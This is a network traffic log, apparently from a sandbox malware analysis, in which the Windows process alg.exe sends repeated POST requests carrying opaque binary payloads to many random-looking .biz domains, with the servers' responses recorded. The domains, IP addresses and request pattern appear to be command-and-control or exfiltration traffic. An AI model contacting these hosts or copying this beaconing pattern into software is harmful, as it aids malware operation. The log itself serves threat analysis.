                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @SSE}p_+VNnI6qyeOG$Tq~&mn]=ut^WIfEw<d$jk_LpRpz&}:,{NMjCw`2qO}EYEVNzG9/m@2@+4t\l_)"%a/Bm`21\F
Nov 18, 2024 09:58:27.383431911 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0ebc6219182dfa388616cd5d0e2fe091|155.94.241.187|1731920307|1731920307|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.10 | 50019 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:27.559196949 CET | 351 | OUT | POST /phrsxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:27.559218884 CET | 778 | OUT | Data Raw: c6 bd 15 c5 3e 2a 91 4d fe 02 00 00 a6 69 01 ae d0 74 84 17 2c bd af c2 c4 30 85 01 bf 1c 90 ba 0b 9d f3 7b 85 fe 8c 72 fc 9a 98 91 a0 77 51 4a 20 bc 14 9e 60 0e c3 fa c0 1f 1a 4e ba 9c db 6b c6 dc 79 34 11 a0 d8 d7 a9 3b a2 ed 86 ef 62 ad 87 14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >*Mit,0{rwQJ `Nky4;bFUcPl`=x@p9x6;A}C{\/T(}jvdY+-3&bDWTN*eb<u*Qa/<ny|6qbpsyd
Nov 18, 2024 09:58:28.225547075 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a4ec6556468993bfc29e1a852e0301a6|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.10 | 50020 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:28.376916885 CET | 353 | OUT | POST /ywvbvutri HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:28.376940966 CET | 778 | OUT | Data Raw: 6d be 5d 76 38 fd 00 b4 fe 02 00 00 c5 df 80 bb 9e 58 f9 15 f8 bf 15 37 3c bc 93 fd 30 d7 41 bf af e3 78 19 32 a0 62 14 8b 06 13 ed 3e 72 aa f7 08 13 ba d5 d7 bb b0 31 3d 56 01 b5 51 2d 18 ae 22 e2 c0 d9 24 ea 62 60 2f 03 d1 05 43 78 68 9a f8 1d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: m]v8X7<0Ax2b>r1=VQ-"$b`/Cxhwxg=3-c\O~t%iWC\XxM/;FLG. n0>b-N;vATq[;f,~B0?y6Om1qcc9qiaMpd>OoI~L.Iy*
Nov 18, 2024 09:58:29.218960047 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8c9f4ca0ca2b171e5a5084c4c09e6c06|155.94.241.187|1731920309|1731920309|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.10 | 50021 | 35.164.78.200 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:29.617110014 CET | 348 | OUT | POST /uahjpn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:29.617110014 CET | 778 | OUT | Data Raw: aa 9a 21 fb ca 34 a5 b9 fe 02 00 00 bd 8a 8a c5 db f8 8e 35 01 a3 3b dc 6d c1 d3 ab cf fc 15 d9 0c 68 82 26 a7 71 e6 9c 14 e3 bf 1c 62 c8 46 21 9e c5 dd a3 db 80 37 75 e9 f2 a4 9c f6 72 ff 88 78 f1 a0 17 34 17 cf 0a 3c 83 8a b4 1a 4e d9 7a cf 46
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !45;mh&qbF!7urx4<NzFZ|v_EBJ(D$P"qX97@w@+S"MO=9"kyH\)zY"rETFVlXfW3%z/,!wmI6A
Nov 18, 2024 09:58:30.446959019 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=107b8616897602fe17bff3ed36d12fe6|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.10 | 50022 | 3.94.10.34 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:30.630033970 CET | 361 | OUT | POST /ylgyimlxuhkehpvh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:30.630162954 CET | 778 | OUT | Data Raw: e8 c1 24 22 e7 cd 27 e3 fe 02 00 00 48 39 86 07 b5 fc 27 fa 38 8f aa 8f d2 bb 71 12 c2 fe 8d ab e5 e8 bc f8 2b fd 61 38 7e 07 96 4e 50 88 a9 2d a1 67 68 cf 41 ad a6 19 bc 0f 43 74 ae 98 c5 56 ac 1a 7a f0 97 1e 90 ad 5b de 2f 14 8d 6b 8a 97 92 43
Nov 18, 2024 09:58:31.303308010 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2e85e6e6a3981529a6768c725fd580e9|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.2.10 | 50023 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:30.657711983 CET | 354 | OUT | POST /tipadjqthieq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:58:30.657756090 CET | 834 | OUT | Data Raw: 0b 2c 4b da 18 8f c3 cb 36 03 00 00 3c 3f 08 07 9a fd 7b dc 8a 6c 2a d6 4b 30 cd ee a5 a4 32 26 a4 7e 76 e8 29 53 8b 74 a9 da 6c bd 6f bd a2 a8 6b e0 d7 2e db 5a df fb 02 94 ba 3d 5d af a7 6f 91 67 88 77 67 d9 c6 9f 62 ab 09 50 c7 33 e4 63 9a a2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.10 | 50024 | 165.160.15.20 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:31.512111902 CET | 352 | OUT | POST /cxebwuvsfeq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:31.516048908 CET | 778 | OUT | Data Raw: c4 89 ef c8 8b 0c 1e 56 fe 02 00 00 5a 4d 30 87 ce 42 75 0a bd 1a 26 cf ae af a3 43 3a 94 da 39 24 f7 57 f7 d1 19 71 a0 71 e7 46 c2 b1 29 38 88 0f 83 ed da 4f a7 53 8a e8 e8 f9 cf 00 75 5a 79 55 67 24 36 a5 b7 3a 5d b8 18 72 26 b4 db 68 f0 dd f2
Nov 18, 2024 09:58:32.282036066 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Nov 18, 2024 09:58:32.336641073 CET | 350 | OUT | POST /wheatfeoc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:32.336719990 CET | 778 | OUT
Nov 18, 2024 09:58:32.558386087 CET | 170 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 08:58:32 GMT
Content-Length: 94
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.10 | 50025 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:32.674824953 CET | 347 | OUT | POST /ac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:32.674865961 CET | 778 | OUT
Nov 18, 2024 09:58:33.512067080 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3835a38075a700ddb900c8ce503420dd|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.10 | 50026 | 208.100.26.245 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:33.707196951 CET | 354 | OUT | POST /ltpabackndy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:33.707216978 CET | 778 | OUT
Nov 18, 2024 09:58:34.344518900 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:58:34 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:34.404469013 CET | 349 | OUT | POST /ohnuij HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:34.404491901 CET | 778 | OUT
Nov 18, 2024 09:58:34.554042101 CET  744                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.10  50027        34.211.97.45    80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:34.777157068 CET  345                OUT        POST /srxp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:34.777190924 CET  778                OUT        Data Raw: 12 9f ae 8e 33 28 8e bb fe 02 00 00 ed c7 9d af 58 8a b1 32 29 05 a9 7e d6 b7 62 d7 c8 44 ba 9e e7 c4 a2 ea f5 f6 74 25 8e bc c6 db 28 ee 68 cf dc 61 7b 7d f1 21 49 00 5d 9a de fc 70 ce a0 48 9a e9 32 60 2a 50 ee c2 89 1c 79 fd 27 05 29 35 67 67
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3(X2)~bDt%(ha{}!I]pH2`*Py')5gghuK5xnx1xY.,%gzlir+|V~P*u>fnMhtyG+d9{(zaYJ)t'[+ed/]WVj6q<s
Nov 18, 2024 09:58:35.571043968 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9f07461e2aab7053cf4b91356108add|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.10  50028        54.244.188.177  80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:35.915338993 CET  353                OUT        POST /cwpmdhyer HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:35.915338993 CET  778                OUT        Data Raw: 97 e5 07 f3 ea c3 2b 89 fe 02 00 00 38 8c c3 e2 42 a6 ac b4 64 b8 03 75 e1 28 49 e3 ad cf 1a fe 26 07 a1 48 bd 6c 9e fc b1 e1 57 d7 69 c6 65 15 af 1b 4d ff 1e bf 38 cc ac 85 d4 1a fa fa 5b 7d 84 f8 90 be fc 73 cf 1d d9 16 b1 d7 1e 58 9f 6b 14 f7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +8Bdu(I&HlWieM8[}sXkOp;loY9LYpJbZPH\m:iCx.%rSj@8x]eLLNL+MPfGaSPs%*7l/O5`/sh17x<r
Nov 18, 2024 09:58:36.749867916 CET  416                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6b773b1fa7a00b348f173bab85980e2f|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.10  50029        18.141.10.107   80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:37.161514044 CET  351                OUT        POST /txxefbew HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:58:37.161537886 CET  778                OUT        Data Raw: d5 c0 ca 78 7c fa d0 8e fe 02 00 00 e4 ee 36 09 e7 38 6b ed d7 5c 52 bb e1 32 1a 12 17 40 18 1d f7 ac 8e c3 9a 48 d0 39 21 1c ae 56 fe 3a 6a b8 0c 9e b7 a3 8c 26 9a 9a 23 8c f9 76 8c ec 46 c4 bd 76 d6 5a 8d 8c 50 ed dd e8 6a 49 42 de 8c 26 45 d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x|68k\R2@H9!V:j&#vFvZPjIB&E9>FP%XnBPZa6Lu*ZG:CW[YVM1f#& )|_aTI=#,pPIG+YMHy~BNZl}_Y(>UW:E
Nov 18, 2024 09:58:38.620486975 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=985eb775d1ab5204848c993cd2909834|155.94.241.187|1731920318|1731920318|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
